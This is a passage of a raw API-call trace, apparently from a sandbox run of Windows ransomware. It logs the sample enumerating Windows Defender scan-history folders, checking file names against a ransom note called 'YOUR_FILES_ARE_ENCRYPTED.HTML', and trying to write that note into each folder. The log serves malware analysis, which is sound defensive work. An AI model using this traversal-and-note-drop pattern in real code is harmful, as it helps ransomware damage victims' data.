lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf41e975, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.344] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf41e975, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.344] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="100018", cAlternateFileName="")) returned 1 [0110.344] StrStrIW (lpFirst="100018", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.344] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\100018") returned 90 [0110.344] PathFindExtensionW (pszPath="100018") returned="" [0110.344] lstrlenW (lpString="") returned 0 [0110.344] PathFindExtensionW (pszPath="100018") returned="" [0110.344] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="109003", cAlternateFileName="")) returned 1 [0110.344] StrStrIW (lpFirst="109003", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.344] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\109003") returned 90 [0110.344] PathFindExtensionW (pszPath="109003") returned="" [0110.344] lstrlenW (lpString="") returned 0 [0110.344] PathFindExtensionW (pszPath="109003") returned="" [0110.344] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="109006", cAlternateFileName="")) returned 1 [0110.344] StrStrIW (lpFirst="109006", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.344] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\109006") returned 90 [0110.344] PathFindExtensionW (pszPath="109006") returned="" [0110.344] lstrlenW (lpString="") returned 0 [0110.344] PathFindExtensionW (pszPath="109006") returned="" [0110.344] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="323", cAlternateFileName="")) returned 1 [0110.344] StrStrIW (lpFirst="323", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.344] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\323") returned 87 [0110.344] PathFindExtensionW (pszPath="323") returned="" [0110.344] lstrlenW (lpString="") returned 0 [0110.344] PathFindExtensionW (pszPath="323") returned="" [0110.344] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf41e975, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf41e975, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf423803, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.344] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf41e975, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf41e975, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf423803, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.344] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.345] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.345] GetProcessHeap () returned 0x600000 [0110.345] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\22\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.345] GetProcessHeap () returned 0x600000 [0110.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.345] GetProcessHeap () returned 0x600000 [0110.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.346] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf428676, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf428676, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf42c1fb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.346] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf428676, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf428676, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf42c1fb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.346] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0110.347] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0110.347] GetProcessHeap () returned 0x600000 [0110.347] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.347] GetProcessHeap () returned 0x600000 [0110.347] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.347] GetProcessHeap () returned 0x600000 [0110.347] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0110.349] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf42fae3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf42fae3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf433568, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.349] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf42fae3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf42fae3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf433568, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.349] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.349] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0110.349] GetProcessHeap () returned 0x600000 [0110.349] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.350] GetProcessHeap () returned 0x600000 [0110.350] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.350] GetProcessHeap () returned 0x600000 [0110.350] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.351] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="RemCheck", cAlternateFileName="")) returned 1 [0110.351] StrStrIW (lpFirst="RemCheck", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.351] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck") returned 72 [0110.351] GetProcessHeap () returned 0x600000 [0110.351] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.352] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck" [0110.352] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\*" [0110.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf43be6b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.352] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf43be6b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.353] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf43be6b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf43be6b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf43fb0b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.353] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf43be6b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf43be6b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf43fb0b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.353] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.353] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0110.353] GetProcessHeap () returned 0x600000 [0110.353] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\remcheck\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.353] GetProcessHeap () returned 0x600000 [0110.353] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.353] GetProcessHeap () returned 0x600000 [0110.353] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.354] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="Results", cAlternateFileName="")) returned 1 [0110.354] StrStrIW (lpFirst="Results", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.354] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 71 [0110.354] GetProcessHeap () returned 0x600000 [0110.354] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.355] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0110.355] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*" [0110.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4481e8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.355] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4481e8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.355] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4481e8, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4481e8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf44a8f7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.355] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4481e8, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4481e8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf44a8f7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.355] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.356] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0110.356] GetProcessHeap () returned 0x600000 [0110.356] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.356] GetProcessHeap () returned 0x600000 [0110.356] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.356] GetProcessHeap () returned 0x600000 [0110.356] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.357] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="Service", cAlternateFileName="")) returned 1 [0110.357] StrStrIW (lpFirst="Service", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.357] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 71 [0110.357] GetProcessHeap () returned 0x600000 [0110.357] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.357] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0110.357] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*" [0110.357] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf453171, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.358] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf453171, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.358] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x48, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="Unknown.Log", cAlternateFileName="")) 